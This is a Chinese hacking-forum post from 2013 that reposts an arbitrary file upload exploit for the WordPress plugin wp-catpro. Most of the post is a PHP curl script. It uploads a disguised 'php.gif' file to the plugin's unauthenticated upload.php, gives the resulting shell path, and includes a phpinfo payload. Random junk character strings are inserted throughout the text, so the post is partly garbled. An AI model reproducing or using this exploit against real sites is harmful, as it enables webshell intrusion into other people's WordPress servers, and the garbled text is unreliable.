找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2065|回复: 0
打印 上一主题 下一主题

WordPress插件wp-catpro任意文件上传

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 20:12:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
  e7 ?' }) V! v0 ~/ [  a+ G5 G" m3 I#-----------------------------------------------------------------------
: e9 W- R5 l8 f5 B+ R: d$ F
% u, s3 D0 F7 e& j  Y. O作者  => Zikou-16
. M/ q* M* ^# m: g邮箱 => zikou16x@gmail.com
' g) ]2 r) a# x" B* x* n' t测试系统 : Windows 7 , Backtrack 5r3
% j0 W& X; N" I' I下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip4 o& H3 E$ Q: E1 c: S
####3 k7 M5 B2 v# v9 i7 I3 R

% ]7 Q. o4 p7 ]3 }" c#=> Exploit 信息:
6 L. Q4 R! @* _% b------------------
4 `8 S. d* y7 G6 J0 B( h# 攻击者可以上传 file/shell.php.gif
$ r$ }% j7 @7 M& q- `! W# Z% P& z# ("jpg", "gif", "png")  // Allowed file extensions
$ I- W6 r; d$ z* x+ C- \4 `# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)( ~8 C% H, D  I6 C5 |
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
- _' _$ Y8 {! O" {------------------# j5 v/ H6 l2 \! z- r
/ S9 |+ T7 l7 D1 \- ^3 {1 M/ g
#=> Exploit' m( ^1 e7 `+ a* }# l
-----------
, _5 y2 I5 B$ c: A  G/ _1 O7 c<?php" L) ?4 r/ m+ R- J9 o$ U5 E& s4 V: H4 _! p( Y
) v2 Q/ x) V, c$ ^+ T7 M% L0 \
$uploadfile="zik.php.gif";
" J$ C; d1 e9 N$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
. _, j% v4 u5 r, N( a! D( xcurl_setopt($ch, CURLOPT_POST, true);9 t/ T; c! b! t
curl_setopt($ch, CURLOPT_POSTFIELDS,
* t9 o! o: z% e- Uarray('Filedata'=>"@$uploadfile",1 m$ v0 D7 y) x/ A1 Q* O
'folder'=>'/wp-content/uploads/catpro/'));/ A5 B: P, O2 n' G
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
5 c! ?" m0 H( R9 c; b4 z$postResult = curl_exec($ch);
8 T5 {2 q. S) Gcurl_close($ch);
- M5 I/ C$ v1 ]! U. C : A4 t' h4 K0 v
print "$postResult";
# T& w/ }! d: ?5 K8 c
$ K) _$ D1 z* n2 [Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
' L8 B2 t8 o# s+ X$ V  ?>
# s; z  R6 d* T! Y<?php
4 c- v3 u& c1 i0 ~phpinfo();
( E+ l2 ~( f' E2 {, [+ E?>
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表